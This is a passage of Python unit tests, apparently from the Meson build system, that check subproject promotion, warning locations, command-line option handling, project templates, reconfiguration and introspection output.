scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'],
cwd=workdir,
stdout=subprocess.DEVNULL)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
{
'descriptive_name': 'subsub',
'name': 'subsub',
'version': 'undefined'
},
{
'descriptive_name': 'subsubsub',
'name': 'subsubsub',
'version': 'undefined'
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
